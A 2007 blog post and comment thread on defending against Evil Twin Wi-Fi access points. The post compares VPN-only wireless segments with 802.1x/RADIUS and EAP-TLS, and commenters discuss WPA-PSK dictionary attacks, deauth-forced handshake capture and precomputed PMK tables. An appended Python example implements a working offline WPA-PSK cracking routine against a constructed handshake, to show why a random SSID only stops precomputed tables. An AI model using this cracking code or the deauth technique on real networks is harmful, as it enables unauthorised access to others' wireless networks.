Tuesday, April 10, 2007

Defeating Evil Twin

The other day I was discussing with thrill how to detect and defeat an Evil Twin access point, and what the best options are besides relying on WEP or WPA. For those who still don't know: WEP is broken outright, and WPA with a pre-shared key (WPA-PSK) falls to an offline dictionary attack against a captured four-way handshake whenever the passphrase is weak, so neither should be treated as the only line of defence. Check my previous post and you will find the tools needed to break those keys. It boils down to two options, but I will let you decide which one is more secure.

Thrill suggested placing an Access Point in the DMZ, with the AP on a private address. A VPN server would also need to be set up in the DMZ, listening for clients that associate with the AP and want to use the wireless service. The wireless segment then carries nothing but VPN traffic: an attacker who sets up an Evil Twin can get clients to associate with him, but those clients have no route anywhere until they bring up a tunnel, and the tunnel only terminates on the real VPN server. This has several advantages and disadvantages, depending on how you look at it. The advantages: all traffic is encrypted, because it is tunnelled to the VPN server before going out to the internet; the SSID can be broadcast and no WEP/WPA security is needed (if you are paranoid, you can still add a WPA key on top); and it defeats most Evil Twins. The one caveat is that the VPN client must verify the server's certificate, otherwise the Evil Twin can simply run its own VPN server and the client will tunnel straight through the attacker. Below is a diagram which depicts the whole scenario.

According to thrill, a separate DMZ is not strictly necessary. It can be an extra network card on the VPN server, with only the VPN server itself and the AP on that segment. Thrill quoted: "The trick is to not allow routing through this interface, and to set up a VPN server on that machine listening ONLY on that interface. And maybe a DHCP server on that interface as well. This is how this network becomes secure, and someone setting up an Evil Twin wouldn't be able to duplicate it. And even if they did, the VPN client can be set up to authenticate a server-side certificate easily enough." I won't say this is 100% secure, but it is the best solution he can think of, and I agree that it is a good solution. The downside of this setup is that every user needs to install the OpenVPN client software on their machine and has to be told how the setup works. That's a hassle.

On the other hand, thrill also quoted: "using 802.1x authentication along with using a RADIUS server for logging in the user. Some of you may have already heard of the technology; it's using the Odyssey client by Funk Software, along with their Steel Belted Radius. Using Cisco APs we were able to enable rotating WEP keys that were only given to the client if their certificate could be authenticated; once they were connected to the wireless network, they then needed to authenticate their user/password via the RADIUS server, which pointed to the LDAP portion of AD. The trick for rotating SSID/WEP keys is using a certificate to authenticate to the actual AP. The AP is set up to point to a RADIUS server which has the certificate on it, then the client sends the AP the supplication requesting the SSID/Key, the AP forwards the request to the RADIUS server, which authenticates the certificate and sends an OK to the AP, who in turn sends the client the SSID/Key to authenticate." The diagram below depicts the scenario:

Whichever is better, if something becomes too hard to use or requires too many steps, most people will be lazy and won't care about it. Then again, it all depends on how the organization wants to implement its systems. Just my opinion.

36 comments:

Security4all said...

How is WPA-PSK flawed? From the FAQ of Aircrack-ng:

Actually, TKIP (WPA1) is not vulnerable: for each packet, the 48-bit IV is mixed with the 128-bit pairwise temporal key to create a 104-bit RC4 key, so there's no statistical correlation at all. Furthermore, WPA provides counter-measures against active attacks (traffic reinjection), includes a stronger message integrity code (Michael), and has a very robust authentication protocol (the 4-way handshake). The only vulnerability so far is a dictionary attack, which fails if the passphrase is robust enough.

If your passphrase is secure enough, it should be considered safe, but only if your SSID isn't a default one, because there are rainbow tables computed for several default SSIDs (the SSID is used as the salt, as stated above).

Anyway, nice article! :)
PEAP+WPA is a better way to protect your network if you can implement 802.1x and a RADIUS server.
Generating a certificate with your own Root CA makes it more difficult for an attacker to gain access since he doesn't have the Root CA's public key. The drawback is that you need to install this private Root CA manually on each device that needs to connect to your network.
EAP-TLS is still the most secure way to go, but on a wide scale it is a lot of work since you need a full-blown PKI infrastructure.

Some references:

* Cisco SAFE: Wireless LAN Security in Depth - version 2
* Microsoft Wireless Deployment Technology and Component Overview

Anonymous said...

security4all, first of all, I would like to thank you for taking the time to read and comment on my blog. I am not really a researcher into wireless, but I know enough about how it operates and how it is vulnerable. If you continue reading the FAQ, you will see this:

[ How can I crack a WPA-PSK network ?

You must sniff until a handshake takes place between a wireless client and the access point. To force the client to reauthenticate, you can start a deauth attack with aireplay-ng. Also, a good dictionary is required. FYI, it’s not possible to pre-compute large tables of Pairwise Master Keys like rainbowcrack does, since the passphrase is salted with the ESSID. ]

You must actually force the user to reauthenticate and deauth the user again to sniff the first handshake.

Actually, I do like the idea of PEAP-WPA with 802.1x and a RADIUS server. As for the private CA, is it possible that once the user has authenticated, you direct him to your internal server where the root CA resides and have the private root CA install automatically onto his machine?

As for EAP-TLS, I am not so sure about it, care to elaborate more?

hackathology.

Anonymous said...

Well, I researched further and I now know how EAP-TLS works. It is indeed the most secure. Below is an excerpt:

"EAP-Transport Layer Security or EAP-TLS, defined in RFC 2716, is an IETF open standard, and is well-supported among wireless vendors. It offers a good deal of security, since TLS is considered the successor of the SSL standard. It uses PKI to secure communication to the RADIUS authentication server, and this fact may make it seem like a daunting task to set up. So even though EAP-TLS provides excellent security, the overhead of client-side certificates may be its Achilles' heel.

EAP-TLS is the original standard wireless LAN EAP authentication protocol. Although it is rarely deployed, it is still considered one of the most secure EAP standards available and is universally supported by all manufacturers of wireless LAN hardware and software including Microsoft. The requirement for a client-side certificate, however unpopular it may be, is what gives EAP-TLS its authentication strength and illustrates the classic convenience vs. security trade-off. A compromised password is not enough to break into EAP-TLS enabled systems because the hacker still needs to have the client-side certificate. When the client-side certificates are housed in smartcards, this offers the most security available because there is no way to steal a certificate's private key from a smartcard without stealing the smartcard itself. It is significantly more likely that physical theft of a smartcard would be immediately noticed and the smartcard revoked and a new card issued than that password theft would be noticed and the password changed or account disabled"

hackathology

Anonymous said...

On WPA:

Do a search on google for coWPAtty.

Now, it's been quite a long time, but from what I remember, EAP-TLS is the preferred form of authentication between the client and the AP while it is requesting authentication of the certificate.

Your suggestion on the Root CA was actually a very good one, and one I forgot to mention in my original thread with hackathology. I did set up my own CA at my place of work, and not only for the security portion of it, but also because we were rolling out dozens of RADIUS servers around the world, which would have required a $500 certificate from another CA. But as you mentioned, this is a very good method for securing your systems and ensuring that no one else can acquire your identity, à la Microsoft's stolen certificate.

--thrill

Anonymous said...

Hey thrill, glad that you are here. Yep, I will do some research on coWPAtty. Thanks for the suggestions. Is your forum launched?

hackathology

Anonymous said...

Not really.. I gotta have you guys take a closer look at the software I'm running.. :)

I'll probably be asking for some help tomorrow on sla.ckers

--thrill

Anonymous said...

Sure thrill, once it's launched, do let me know. I will create an account there.

hackathology

Security4all said...

So PEAP with a private CA or EAP-TLS are still the two secure enterprise setups. Glad that it's confirmed! :-)

I had a look at coWPAtty... it's an offline dictionary attack. If you choose your SSID randomly enough that there is no precomputed (rainbow) table for it, and a strong password, it should not be possible to crack the WPA-PSK.

From Wireless Defence:
genpmk is used to precompute the hash files in a similar way to how rainbow tables are used to pre-hash passwords in Windows LANMan attacks. There is a slight difference however in WPA, in that the SSID of the network is used as well as the WPA-PSK to "salt" the hash. This means that we need a different set of hashes for each and every unique SSID, i.e. a set for "linksys", a set for "tsunami", etc. The Church of Wifi have produced some lookup tables for 1000 SSIDs computed against a 170,000-word password file. The resultant tables are approximately 7 Gigabytes in size.


At least not for now.... but faster bruteforcing (or generating tables) is the greatest danger. Check it out: Faster PwninG Assured or the video

Anonymous said...

Well, in my opinion, setting a random, hard-to-guess alphanumeric SSID should do the trick.

hackathology.
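Added example (not code from the post, from thrill, or from any of the commenters): the offline WPA-PSK dictionary attack that the post's "WPA can be broken" claim, the aircrack-ng FAQ excerpt quoted above and the genpmk description rest on, written out in Python so the role of the SSID is visible. It derives the PMK the way 802.11i specifies (PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 rounds, 256-bit output), expands it into the PTK with PRF-512, and tests a candidate passphrase against the MIC on a captured message 2 of the four-way handshake. The handshake, MAC addresses, nonces and wordlist are constructed here, and the EAPOL frame layout omits the RSN IE a real client sends; the "password"/"IEEE" vector is the one from the 802.11i Annex H test cases.

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass


def derive_pmk(passphrase, ssid):
    """802.11i PSK-to-PMK mapping: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes.
    The SSID salt is why a precomputed PMK table is only good for the SSID it was built for."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk, aa, spa, anonce, snonce):
    """802.11i PRF-512: expands PMK + both MACs + both nonces into the 64-byte PTK.
    The first 16 bytes of the PTK are the KCK that keys the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(kck, eapol_mic_zeroed, key_version):
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed:
    HMAC-MD5 for key descriptor version 1 (TKIP), HMAC-SHA1-128 for version 2 (CCMP)."""
    if key_version == 1:
        return hmac.new(kck, eapol_mic_zeroed, hashlib.md5).digest()
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce, key_info):
    """Constructed EAPOL-Key message 2 (client -> AP) with the MIC field zeroed.
    Real frames carry the client's RSN IE in the key data; this sample omits it."""
    body = (
        struct.pack("!BHHQ", 2, key_info, 16, 1)  # descriptor type, key info, key length, replay counter
        + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
        + b"\x00" * 16 + struct.pack("!H", 0)  # MIC (zeroed), key data length
    )
    return struct.pack("!BBH", 1, 3, len(body)) + body  # EAPOL version, type Key, length


@dataclass
class Handshake:
    """The parts of a captured four-way handshake the offline attack needs."""
    ssid: str
    ap_mac: bytes
    client_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol2: bytes  # message 2 as seen on the air, MIC field zeroed
    mic: bytes  # the 16-byte MIC the client actually sent
    key_version: int


def simulate_capture(passphrase, ssid, ap_mac, client_mac, anonce, snonce, key_version=2):
    """Play the legitimate client: derive the real KCK and sign message 2, which is
    exactly what a sniffer sees after a deauth forces a re-association."""
    ptk = prf512(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    frame = build_eapol_msg2(snonce, 0x0108 | key_version)  # pairwise + MIC bits + version
    return Handshake(ssid, ap_mac, client_mac, anonce, snonce, frame,
                     eapol_mic(ptk[:16], frame, key_version), key_version)


def pmk_matches(hs, pmk):
    """The per-candidate test: rebuild the KCK from this PMK and compare MICs."""
    ptk = prf512(pmk, hs.ap_mac, hs.client_mac, hs.anonce, hs.snonce)
    return hmac.compare_digest(eapol_mic(ptk[:16], hs.eapol2, hs.key_version), hs.mic)


def precompute_pmk_table(ssid, wordlist):
    """genpmk-style table: the expensive PBKDF2 step done once per (SSID, word)."""
    return {word: derive_pmk(word, ssid) for word in wordlist}


def attack_with_table(hs, table):
    """Table lookup; only useful if the table was built for this handshake's SSID."""
    return next((w for w, pmk in table.items() if pmk_matches(hs, pmk)), None)


def attack_online(hs, wordlist):
    """Plain dictionary run: derive every PMK for the captured SSID on the fly."""
    return next((w for w in wordlist if pmk_matches(hs, derive_pmk(w, hs.ssid))), None)


def demo():
    """Constructed scenario: the same weak passphrase on a default SSID and on a random one."""
    wordlist = ["123456", "password", "linksys", "dragon2007", "letmein"]  # constructed
    ap, sta = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd")  # constructed MACs
    anonce = hashlib.sha256(b"constructed ANonce").digest()
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    default_ssid = simulate_capture("dragon2007", "linksys", ap, sta, anonce, snonce)
    random_ssid = simulate_capture("dragon2007", "xk7Qr-home", ap, sta, anonce, snonce)
    table = precompute_pmk_table("linksys", wordlist)
    return {
        "default_ssid_table": attack_with_table(default_ssid, table),  # "dragon2007"
        "random_ssid_table": attack_with_table(random_ssid, table),  # None: wrong salt
        "random_ssid_online": attack_online(random_ssid, wordlist),  # "dragon2007" anyway
    }


if __name__ == "__main__":
    print(demo())
```

Running it shows both sides of the SSID point made in the comments: the table built for "linksys" recovers the passphrase on the default-SSID network and fails outright on the renamed network, but the plain dictionary run against the captured SSID recovers "dragon2007" either way. A random SSID only protects against precomputed tables; the passphrase still has to survive a dictionary run on its own, and the 802.1x/EAP options described in the post remove the shared secret altogether.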
